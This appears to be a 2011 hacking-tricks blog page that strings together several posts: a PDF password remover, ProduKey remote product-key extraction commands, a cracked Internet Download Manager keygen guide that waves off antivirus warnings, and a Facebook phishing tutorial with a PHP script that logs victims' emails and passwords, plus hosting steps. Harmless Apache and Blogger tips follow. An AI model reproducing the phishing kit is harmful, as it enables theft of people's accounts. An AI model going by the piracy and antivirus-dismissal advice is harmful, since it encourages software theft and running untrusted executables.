Saturday, 17 December 2011

Unlock Password Protected PDF Files

In this article I am going to share a nice trick to unlock or remove password protected PDF files.You may seen some PDF files downloaded from internet or from any other source with password protected.That is it will ask for password everytime when it is opened.It may be annoying for you to enter the passwords each time or to open the PDF files for which you dont even know its password.So here I am going to introduce a tool called PDF Password Remover. ThisTool is a PDF decryption tool developed by PDF Technologies that can be used to decrypt password protected PDF files.PDF Password Remover Tool can remove owner password from PDF files. PDF files with the owner password set would prevent viewers from editing, selecting text, printing and otherwise changing any of the pdf properties such as form fields etc.

DOWNLOAD LINK


HOW TO REMOVE PASSWORD

1. Removing password of a PDF file is so simple.Just open the tool to see a window as shown below.


2. Just open the password protected PDF file and select where to save the file and click the convert button.The newly created PDF file will be password free and thats it...

NOTE: The Password Remover tool will NOT work with PDF files that have a user password set.

Recover Microsoft Office 2010 Key

ProduKey is a small utility which helps recover the original product ID and CD key of MS Office 2010/ Office 2007 and Office 2003. This software is very useful if you lost your original MS office 2010 CD or serial number and you want to reinstall it on your computer.


What is Produkey ?

With ProduKey, you can find the Microsoft Office serial number of your current operating system or remote computer using command line options.



How to use ?

For using this software, extract the files to any folder and then run the executable file with name produkey.exe.

For extracting the product key of MS Office from all the remote computers in your network, use the below command line option.

/remoteall – This command will load the product keys from all the computers in your network which you have admin privileges.

Other command line examples
produkey.exe /remote \\Server01
produkey.exe /remotefile "c:\temp\computers.txt"
produkey.exe /regfile "F:\WINNT\system32\config\software"
produkey.exe /windir "c:\winnt" /shtml "c:\temp\pk.html"
produkey.exe /remoteall
produkey.exe /remotealldomain MyDomain
produkey.exe /iprange 192.168.1.10 192.168.1.50
produkey.exe /stab "" >> c:\temp\prd.txt
produkey.exe /OfficeKeys 0 /WindowsKeys 1 /shtml f:\temp\keys.html

System requirements
Works on Windows 2000/XP/2003/2008/Vista/7.

Software Summary
ProduKey finds the product key of MS Office 2010 with which you have initially installed Microsoft office on your computer.


File Details:
Download: ProduKey 
File Size: 46.6 KB
File Exten
sion: .zip (Compressed Archive)

Internet Download Manager v6.07 Full Version


Hello again everyone,this article is surely going to boost your download speed by 20%.Compared to other download Managers,Internet Download Manager (IDM) is the best and most efficient in downloading files which optimizes and also provides good connection with your computer and the server.Since,this is avaible only as a paid version i found this full cracked version which gives you the advantage of a full user.





What is Internet Download Manager ?

Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns,or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads.Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.


Download this file before you read the rest of the article:

File Details: 
Download: Internet Download Manager v6.07 Keygen + Patch
File Size: 4.54MB
File Extension: .rar (Compressed Archive)
Virus Scan: http://www.virustotal.com/file-scan/report.html?id=16ff4927174e13d3bfa6da64956c8fb50a6087fba07b26234d0a4bfcdbaff729-1320855746

Note:Don't worry it is not a virus it is just a Packed file so it is detected as a virus.Moreover many Anti-Viruses block Keygen as a safety precautions.Its absolutely clean or else you can always go for "Sandboxie"

How to Use the Keygen/Patch ?

1.Install the program.
2.Restart your PC if asked.
3.Make sure 'Internet Download Manager' is NOT running after you have restarted.You can use the Task Manager to end any associated Processes.
4.Go the file folder "SND" and then copy "SnDk&p.exe" into the folder where you have installed IDM.And make sure IDMan.exe is in that folder.Run the solution provided and apply patch to the file 'IDMan.exe'
5.Run 'Internet Download Manager'.
6.Generate a serial from "SnDk&p.exe" and use it for registration when it is asked.

That's it ! Now your IDM will be of full version and you don't have to worry about it with this actvator

Facebook Phishing: Create Facebook Phishing pages..


Today I will tell you about the famous hacking technique called “Phishing“. In this technique hackers just make a fake page of any website to hack user account , then if user entre his/her account name and password hacker get the account details and hack the account of user.
Before starting i just want to tell you the this information is for only knowlegde not for the practical use.
I will tell you how to create phishing pages for facebook. To view demo visit View demo
Steps to create a phishing page of facebook:======
1. First goto Facebook login page (make sure that the page is loaded completely) and right click and select view source (in firefox) or view source code option in other browsers.
2. Select all ( CTR + A ) and copy all the code and paste it in notepad.
3. Then search(CTR + F) for the keyword action.You can see the code as given below.
action=”https://www.facebook.com/login.php?login_attempt=1″
4. Just change the above code as mentioned below
action=”pass.php”
after changing to pass.php (or anyname.php) just save it in the form facebook.html (anyname.html). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.
5. For creating a php script,just copy the below php code into notepad and save in the format pass.php (name mentioned in action of our phishing page)
<?php$fp = fopen("Passwords.htm", "a");fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");echo "“;?>


Note:‘http://www.facebook.com‘ is the redirection url,When victim will enter his/her email and password he will redirected to’http://www.facebook.com‘
6. By this step our PHP script is also ready,
7. Now host these 2 files ie,
facebook.html
pass.php
in any of free hosting servers like ripway,drivehq,110 mb or t35.com etc (or any other,just google free hosting).Make sure that these 2 files are in same directory.
8. After hosting you will get a direct link to your phishing page,that is to your facebook.html page.just use this link to access or send phishing page.
9. When anyone tries to login through your phishing page a new html page with name password.html will be automatically created in your hosting directory with the password and username entered there.

Home HTTP Server – How To Create One


In this tutorial we will see how to create an HTTP server. A web server is software installed on a computer that allows other computers to access specific files on that computer/server. There are many reasons to create your own home servers. For example: file sharing, so you can download files from your home computer from anywhere or you can create a web site on own server etc. Simply said It works like this; You choose a directory on your computer , in that directory add folders, files like music,video and etc. When you put the IP address of your computer the in web browser you can see all the files from that folder and you can download those files. Let’s now create a server(HTTP server!) using Apache(a server client):
1. You must have:
  • Broadband internet connection always on
  • Windows on your computer
2. Create a folder on your disc , in this example I created a folder on E:\my server
3. Download apache_2.2.10-win32-x86-no_ssl.msi and install it, set parameters( for localhost type something like a myserver.com(doesn’t really matter), also type your email address in field “Administrator@ Email Address” ) as shown below, choose where you want to install it.


4..When you install Apache , go to directory where you installed it (p.e. “C:\Program Files\Apache Software Foundation\Apache2.2\conf”) , here you will find a httpd file.
Open that file with notepad.
After this will appear notepad with long and complicated code, don´t worry, you must change just 3 things.
5. In notepad file find #DocumentRoot “C:/Program Files/Apache Group/Apache2/htdocs”and replace with #DocumentRoot “E:\my server”. Also find #<Directory  “C:/Program Files/Apache Group/Apache2/htdocs” and replace with <Directory  “E:\my server”.  E:\my server is folder where you put files which will appear on your server. In this example I created that folder on local disc E:. You can create your folder in any other place, but then type that path here. Find #AllowOverride None and change to AllowOverride All.
Change selected code


After this, save file like httpd.conf.
6. Type in web addresses http://localhost/ or your IP Address, you should see something like this
Every files you put in folder , which we created in step 2 , will be shown on http://localhost/
7. If you want access own server from other computers. You must forward a port in the router we’re using. The port we need to forward is port number 80. Why? Because by default it’s the port used for HTTP. Port forwarding actually means opening a tunnel through the router so that the router wouldn’t reject the connections that are trying to connect to it. How to port-forward? With every router it’s different. You must also turn off you firewall.
That is all. Enjoy your home server. If you have questions, post them in the comments area.
Note: Creating home server is risky,when you open port, there is a possibility to have someone a breach in your computer .Before you start, make sure your computer has all the latest patches and security updates, and that you’ve done a thorough spyware and virus scan. This tutorial is only for advanced users

Saturday, 23 July 2011

Page Jumps



quotes1
Hi Annie! Just wondering.. how would you make a link in a blog which in it will take you to that part in a blog? Don't get it? Here's what I mean..
For example, "Steps on Baking Pastry:" There will be list of the steps first then, the steps. For ex., you click "Step 8: Putting it in the Microwave", it takes you to:
"Step 8: Putting it in the Microwave
Put it there for 3-5 minutes until...."
?? Just wondering.. Would be glad if you answer back!
quotes2

Instead of reinventing the wheel, I found this wonderful tutorial.
Jumping Inside Pages - HTML Tutorials

post signature

Friday, 22 July 2011

Chicklets...a blast from the past

quotes1
Hi!

I just commented on your post, Optimize your blog for mobile devices, and read a couple of your other articles. As a blogger myself, I am impressed.

I also just added your I Love BlogU button to my brand new Hacker Study (http://www.hackerstudy.com) blog.

Could I trouble you for the info, how or where did you make that button? I have several Blogger hosted blogs and I would really like to provide these buttons for my readers as well.

Considering that you have lots of tweaks for Blogger, I will be visiting you on a regular basis.

Sincerely,

Tom
quotes2

Well, this is the little button he was talking about.   I made it ages ago when I was in love with Chicklets. A Chicklet is an 80x15 button. Very exact on the size. If it's not 80x15, it is not a chicklet! I had a gazillion in my cellar on BlogU. But, I have since house cleaned and left only this one little chicklet to give away to anyone that wants it.

If, you want a Chicklet to brand your site, or profess your love for clouds, Firefox, trees, iPhones...or whatever...these are the sites you can go to make them.

  1. Brilliant Button Maker By the way, this is the one I used to make my Chicklet because it allows an image to be used.
  2. Just another button maker
  3. Adam Kasly Button Maker This site has a nice clean design, which may appeal to you.

And this is just a collection of Blogger Badges a.k.a. antipixel buttons, chicklets
so you can see what all can be done with these little snazzy buttons.

post signature